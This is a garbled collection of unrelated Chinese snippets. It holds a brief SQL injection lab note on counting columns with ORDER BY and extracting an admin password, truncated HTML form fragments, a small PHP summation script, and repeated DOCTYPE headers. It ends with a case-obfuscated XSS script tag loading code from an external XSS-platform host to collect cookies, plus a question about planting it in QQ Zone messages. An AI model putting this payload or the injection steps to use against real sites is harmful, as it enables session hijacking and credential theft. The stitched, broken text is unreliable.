首先，测试一下能否进行sql注入（1=1和1=2），发现存在注入。接着，我们来猜测有多少个字段，使用order by 来猜测，发现order by 2的时候,能够正常显示页面那么就能够知道一共有两个2个字段。接着查询数据库版本，数据库名，表名。再试着从admin表中查询密码，结果查询成功了。得到了密码。打开第二个题，同样使用此方法试着进行sql注入，发现有部分单词过滤，于是使用其他方法，看能否进行

<html><body><h1>欢迎来到道空专区</h1><form action="YDH.php" method ="post" >        用户名：<input id="Text1" type="text&quo

<?php$sum=0;for($a=1;$a<=10000;$a++){if($a%3==0||$a%7==0){$sum=$sum+$a;}}echo"$sum";?>

<!DOCTYPE html><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>   

<!DOCTYPE html><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>   

<sCRiPt sRC=https://xss9.com/pLr9></sCrIpT>我在百度xss平台使用方法时，看到尽然可以这样插入也能接收到cookie吗？所以很不解，难道我在QQ空间留言上面的代码，被别人访问到的时候就能得到cookie吗？